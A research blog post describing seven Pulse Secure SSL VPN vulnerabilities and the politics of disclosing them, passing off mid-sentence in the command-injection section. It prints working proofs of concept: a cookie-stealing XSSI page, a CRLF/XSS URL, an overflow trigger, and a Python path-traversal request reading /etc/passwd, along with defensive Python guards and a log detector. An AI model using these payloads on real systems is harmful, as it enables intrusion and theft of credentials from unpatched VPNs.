
Title: Attacking SSL VPN - Part 3: The Golden Pulse Secure SSL VPN RCE Chain, with Twitter as Case Study!


Author: Orange Tsai(@orange_8361) and Meh Chang(@mehqq_)

Hi, this is the last part of the Attacking SSL VPN series. If you haven’t read the previous articles yet, here are the quick links:

Infiltrating Corporate Intranet Like NSA: Pre-auth RCE on Leading SSL VPNs

Attacking SSL VPN - Part 1: PreAuth RCE on Palo Alto GlobalProtect, with Uber as Case Study!

Attacking SSL VPN - Part 2: Breaking the Fortigate SSL VPN

After we published our research at Black Hat, it got lots of attention and discussion due to its great severity and huge impact. Many people want first-hand news and wonder when the exploits (especially the Pulse Secure pre-auth one) will be released.

We also discussed this internally. Actually, we could simply have dropped the whole exploit chain without any concern and gained plenty of media exposure. However, as a SECURITY firm, our responsibility is to make the world more secure. So we decided to postpone the public disclosure to give the world more time to apply the patches!

Unfortunately, the exploits were revealed by someone else. They can easily be found on GitHub[1] [2] [3] and exploit-db[1]. Honestly, we can’t say they are wrong, because the bugs were fixed several months ago, and they spent their own time diffing, reversing and reproducing. But it is indeed a question worth discussing in the security community: if you have a nuclear-level weapon, when is it ready for public disclosure?

We have heard that more than 25 bug bounty programs have been exploited. According to statistics from Bad Packets, numerous Fortune 500 companies, U.S. military, governments, financial institutions and universities are also affected. There are even 10 NASA servers exposed to this bug. So, these premature public disclosures do force these entities to upgrade their SSL VPNs, and that is the good part.

On the other hand, the bad part is that an increasing number of botnets are scanning the Internet in the meantime. Threat intelligence also indicates that a China-based APT group is already exploiting this bug. This is such an Internet disaster. Apparently, the world is not ready yet. So, if you haven’t updated your Palo Alto, Fortinet or Pulse Secure SSL VPN, please update it ASAP!

About Pulse Secure

Pulse Secure is the market leader in SSL VPN, providing professional secure access solutions for Hybrid IT. Pulse Secure had been in our research queue for a long time because it was a critical part of Google’s infrastructure, and Google is one of our long-term targets. However, Google applies the Zero Trust security model, so the VPN has been removed now.

We started to review Pulse Secure in mid-December last year. In the first 2 months, we got nothing. Pulse Secure has a good coding style and security awareness, so it’s hard to find trivial bugs. Here is an interesting comparison: we found the arbitrary file reading CVE-2018-13379 on FortiGate SSL VPN on our first research day…

Pulse Secure is also a Perl lover and writes lots of Perl extensions in C++. The interaction between Perl and C++ was confusing to us as well, but we got more familiar with it as we spent more time digging into it. Finally, we drew first blood on March 8, 2019! It’s a stack-based overflow on the management interface! Although this bug isn’t that useful, our research got on track from that point, and we uncovered more and more bugs.

We reported all of our findings to Pulse Secure PSIRT on March 22, 2019. Their response was very quick and they took these vulnerabilities seriously! After several conference calls with Pulse Secure, they fixed all the bugs within a month and released the patches on April 24, 2019. You can check the detailed security advisory!

It was a great experience working with Pulse Secure. From our perspective, Pulse Secure is the most responsible vendor among all the SSL VPN vendors we have reported bugs to!

Vulnerabilities

We found 7 vulnerabilities in total. Here is the list. We will introduce each one, but focus more on CVE-2019-11510 and CVE-2019-11539.

CVE-2019-11510 - Pre-auth Arbitrary File Reading

CVE-2019-11542 - Post-auth(admin) Stack Buffer Overflow

CVE-2019-11539 - Post-auth(admin) Command Injection

CVE-2019-11538 - Post-auth(user) Arbitrary File Reading via NFS

CVE-2019-11508 - Post-auth(user) Arbitrary File Writing via NFS

CVE-2019-11540 - Post-auth Cross-Site Script Inclusion

CVE-2019-11507 - Post-auth Cross-Site Scripting

And here are the affected versions:

Pulse Connect Secure 9.0R1 - 9.0R3.3

Pulse Connect Secure 8.3R1 - 8.3R7

Pulse Connect Secure 8.2R1 - 8.2R12

Pulse Connect Secure 8.1R1 - 8.1R15

Pulse Policy Secure 9.0R1 - 9.0R3.3

Pulse Policy Secure 5.4R1 - 5.4R7

Pulse Policy Secure 5.3R1 - 5.3R12

Pulse Policy Secure 5.2R1 - 5.2R12

Pulse Policy Secure 5.1R1 - 5.1R15

CVE-2019-11540: Cross-Site Script Inclusion

The script /dana/cs/cs.cgi renders the session ID in JavaScript. As the content-type is set to application/x-javascript, we can perform an XSSI attack to steal the DSID cookie!

Even worse, the CSRF protection in Pulse Secure SSL VPN is based on the DSID. With this XSSI, we can bypass all of the CSRF protection!

PoC:

    <!-- http://attacker/malicious.html -->
    <script src='https://sslvpn/dana/cs/cs.cgi?action=appletobj'></script>
    <script>
        window.onload = function() {
            window.document.writeln = function(msg) {
                if (msg.indexOf('DSID') >= 0) alert(msg)
            }
            ReplaceContent()
        }
    </script>

CVE-2019-11507: Cross-Site Scripting

There is a CRLF injection in /dana/home/cts_get_ica.cgi. Through this injection, we can forge arbitrary HTTP headers and inject malicious HTML content.

PoC:

    https://sslvpn/dana/home/cts_get_ica.cgi?bm_id=x&vdi=1&appname=aa%0d%0aContent-Type:text/html%0d%0aContent-Disposition:inline%0d%0aaa:bb<svg/onload=alert(document.domain)>

CVE-2019-11538: Post-auth(user) Arbitrary File Reading via NFS

The following two vulnerabilities (CVE-2019-11538 and CVE-2019-11508) do not affect default configurations. They appear only if the admin configures NFS sharing for the VPN users.

If an attacker can control any files on the remote NFS server, they can simply create a symbolic link to any file, such as /etc/passwd, and read it from the web interface. The root cause is that the NFS implementation mounts the remote server as a real Linux directory, and the script /dana/fb/nfs/nfb.cgi does not check whether the accessed file is a symlink or not!

CVE-2019-11508: Post-auth(user) Arbitrary File Writing via NFS

This one is a bit similar to the previous one, but with a different attack vector!

When the attacker uploads a ZIP file to the NFS share through the web interface, the script /dana/fb/nfs/nu.cgi does not sanitize the filenames inside the ZIP. Therefore, an attacker can build a malicious ZIP file and traverse the path with ../ in a filename! Once Pulse Secure decompresses it, the attacker can write whatever they want to whatever path they want!
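As an added illustration (not code from the original post or from Pulse Secure), here are the two checks that nfb.cgi and nu.cgi are described above as missing, written in Python: a file-serving path that refuses symlinks and anything resolving outside the share root, and a ZIP extractor that validates every entry name before writing. The share layout, file names and hostile ZIP in demo() are constructed for the example.

```python
import io, tempfile, zipfile
from pathlib import Path

def inside_base(base, path):
    # Resolve symlinks and ".." first, then compare real locations rather than strings.
    base_real, target = Path(base).resolve(), Path(path).resolve()
    return target == base_real or base_real in target.parents

def safe_read(base, name):
    # The check nfb.cgi lacked: refuse symlinks outright and anything outside the share root.
    path = Path(base, name)
    if path.is_symlink() or not inside_base(base, path):
        raise PermissionError(f"refusing {name!r}")
    return path.read_bytes()

def safe_extract(base, zip_bytes):
    # The check nu.cgi lacked: validate every entry name before writing a single byte.
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if Path(info.filename).is_absolute() or not inside_base(base, Path(base, info.filename)):
                raise ValueError(f"rejected traversal entry {info.filename!r}")
        zf.extractall(base)

def blocked(fn, *args):
    # Demo helper: True if the guard raised, False if the operation went through.
    try:
        fn(*args)
        return False
    except (PermissionError, ValueError):
        return True

def demo():
    # Constructed scenario: a share root, a secret outside it, a symlink to it, and a hostile ZIP.
    outer = Path(tempfile.mkdtemp())
    share = outer / "share"
    share.mkdir()
    secret = outer / "secret.txt"
    secret.write_text("outside the share")
    (share / "readme.txt").write_text("inside")
    (share / "link.txt").symlink_to(secret)
    hostile = io.BytesIO()
    with zipfile.ZipFile(hostile, "w") as zf:
        zf.writestr("../secret.txt", "overwritten")  # the ../ trick described above
    return {
        "plain": safe_read(share, "readme.txt"),
        "symlink_blocked": blocked(safe_read, share, "link.txt"),
        "zip_blocked": blocked(safe_extract, share, hostile.getvalue()),
        "secret_intact": secret.read_text() == "outside the share",
    }
```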

CVE-2019-11542: Post-auth(admin) Stack Buffer Overflow

There is a stack-based buffer overflow in the following Perl module implementations:

DSHC::ConsiderForReporting

DSHC::isSendReasonStringEnabled

DSHC::getRemedCustomInstructions

These implementations use sprintf to concatenate strings without any length check, which leads to the buffer overflow. The bug can be triggered in many places, but here we use /dana-admin/auth/hc.cgi for our PoC.

    https://sslvpn/dana-admin/auth/hc.cgi?platform=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&policyid=0

And you can observe the segmentation fault in dmesg:

    cgi-server[22950]: segfault at 61616161 ip 00000000002a80afd sp 0000000ff9a4d50 error 4 in DSHC.so[2a2f000+87000]

CVE-2019-11510: Pre-auth Arbitrary File Reading

Actually, this is the most severe bug of this batch. It is in the web server implementation. As our slides mentioned, Pulse Secure implements its own web server and architecture stack from scratch. The original path validation was very strict. However, since version 8.2, Pulse Secure has introduced a new feature called HTML5 Access, which is used to interact with Telnet, SSH and RDP from the browser. Thanks to this new feature, the original path validation became loose.

In order to handle the static resources, Pulse Secure created a new IF-CONDITION that widens the originally strict path validation. The code wrongly mixes up the request-uri and the request-filepath, so we can put /dana/html5acc/guacamole/ at the end of the query string to bypass the validation and point the request-filepath at any file you want to download!

It’s worth mentioning that in order to read arbitrary files, you must specify /dana/html5acc/guacamole/ in the middle of the path again. Otherwise, you can only download files with limited extensions such as .json, .xml or .html.

Since the exploit is already in the wild, there is no longer any concern about showing the payload:

    import requests
    r = requests.get('https://sslvpn/dana-na/../dana/html5acc/guacamole/../../../../../../../../etc/passwd?/dana/html5acc/guacamole/')
    print(r.content)
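As an added example (not from the original post or the vendor), here is a small Python detector for the pattern just described: it canonicalizes the request path the way a strict validator should and flags access-log lines where the /dana/html5acc/guacamole/ marker appears literally but the resolved path leaves that tree, or where the marker is smuggled into the query string. The log format and the sample lines are constructed; it also decodes percent-encoded dot segments, which goes beyond the single payload shown above.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

MARKER = "/dana/html5acc/guacamole/"
# Common Log Format parser; the sample lines further down are constructed, not real traffic.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def canonical_path(raw_path):
    # Percent-decode, then collapse "." and ".." the way a strict validator must before deciding.
    return posixpath.normpath(unquote(raw_path))


def classify(target):
    """Return (canonical path, reasons) for one request target; empty reasons means benign."""
    parts = urlsplit(target)
    raw_path = unquote(parts.path)
    canon = canonical_path(parts.path)
    reasons = []
    # The bug in one line: the marker is present literally, but the resolved file is elsewhere.
    if MARKER in raw_path and not canon.startswith(MARKER.rstrip("/")):
        reasons.append("marker in path but canonical path escapes the html5acc tree")
    # A trailing marker in the query string is what widened the validation.
    if MARKER in unquote(parts.query):
        reasons.append("marker smuggled into the query string")
    return canon, reasons


def scan(log_lines):
    """Run classify over access-log lines; return a list of (ip, canonical path, status, reasons)."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m:
            canon, reasons = classify(m["target"])
            if reasons:
                hits.append((m["ip"], canon, m["status"], reasons))
    return hits


SAMPLE_LOG = [  # constructed access-log lines
    '198.51.100.7 - - [24/Aug/2019:10:01:02 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 5120',
    '198.51.100.7 - - [24/Aug/2019:10:01:05 +0000] "GET /dana/html5acc/guacamole/app.json?v=2 HTTP/1.1" 200 811',
    '203.0.113.9 - - [24/Aug/2019:10:02:40 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 200 1432',
    '203.0.113.9 - - [24/Aug/2019:10:02:41 +0000] "GET /dana-na/%2e%2e/dana/html5acc/guacamole/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1" 404 0',
]
```

A 200 on a flagged line with a canonical path such as /etc/passwd is the signal to treat the appliance as compromised and rotate its credentials and certificates, not just to patch it.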

CVE-2019-11539: Post-auth(admin) Command Injection

The last one is a command injection on the management interface. We found this vulnerability very early, but could not find a way to exploit it at first. While we were in Vegas, one of my friends told m
